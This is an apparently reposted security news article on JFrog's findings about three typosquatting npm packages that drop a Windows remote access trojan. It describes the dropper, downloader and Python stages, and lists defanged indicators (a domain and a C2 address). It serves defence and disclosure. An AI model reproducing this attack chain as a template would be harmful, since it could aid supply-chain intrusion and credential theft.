Cybersecurity researchers have discovered a set of malicious npm packages that are designed to deliver a Windows-based remote access trojan (RAT).
The list of identified packages, is below –
- aes-decode-runner-pro (145 downloads)
- postcss-minify-selector (256 downloads)
- postcss-minify-selector-parser (615 downloads)
All the packages were published over the past month by an npm user named “abdrizak” and continue to be available for download from npm as of writing.Â
“Aes-decode-runner-pro and postcss-minify-selector-parser both present themselves as layered AES/custom-codec packages and depend on the legitimate postcss-selector-parser,” JFrog said in an analysis. “Postcss-minify-selector presents itself as a PostCSS selector minifier and depends on postcss-minify-selector-parser.”
As for “postcss-minify-selector-parser,” the name is a reference to “postcss-selector-parser,” a widely used npm library with more than 127 million weekly downloads. Regardless of the package downloaded, the attack chain leads to the deployment of the same Windows malware.
The packages come embedded with a JavaScript dropper that writes a PowerShell script (“settings.ps1”) to disk and executes it. The PowerShell script then acts as a downloader for a next-stage payload retrieved from an external server (“nvidiadriver[.]net”) using the “curl.exe.”
The retrieved payload is a ZIP archive, from which a Visual Basic Script (“update.vbs”) file is extracted and run using “wscript.exe.” Also bundled in the downloaded ZIP file is a Python runtime, a Python loader (“loader.py”), and a number of Python extension modules (*.pyd) compiled using Nuitka.
Visual Basic is responsible for setting up the Python environment on the compromised host and launching the “loader.py” script, which then triggers the core logic of the malware. The RAT is equipped to gather host information, siphon credentials from Google Chrome, collect data from Chrome extensions, run shell commands, and download/upload files to and from a command-and-control (C2) server (“95.216.92[.]207:8080”).
These features are realized through a set of Python native extension modules –
- config.pyd, which contains constants, command IDs, C2 URL, registry key names
- api.pyd, which handles HTTP C2 packet exchange
- audiodriver.pyd, which handles the main RAT orchestration loop
- command.pyd, which profiles the host, runs virtual machine (VM) checks, file transfer, and shell execution
- auto.pyd, which performs Chrome credential and extension theft, bypassing app-bound encryption (ABE) protections
- util.pyd, which acts as tar/gzip archive helpers
“This case shows how a small parser-like package can hide a multi-stage Windows payload while appearing related to legitimate build tooling with massive weekly usage,” JFrog said. “For defenders, the important lesson is to treat lookalike build dependencies as potential delivery mechanisms,…
Source link
Disclaimer
We strive to uphold the highest ethical standards in all of our reporting and coverage. We blogs.grocliq.com want to be transparent with our readers about any potential conflicts of interest that may arise in our work. It’s possible that some of the investors we feature may have connections to other businesses, including competitors or companies we write about. However, we want to assure our readers that this will not have any impact on the integrity or impartiality of our reporting. We are committed to delivering accurate, unbiased news and information to our audience, and we will continue to uphold our ethics and principles in all of our work. Thank you for your trust and support.
Website Upgradation is going on for any glitch kindly connect at [email protected]
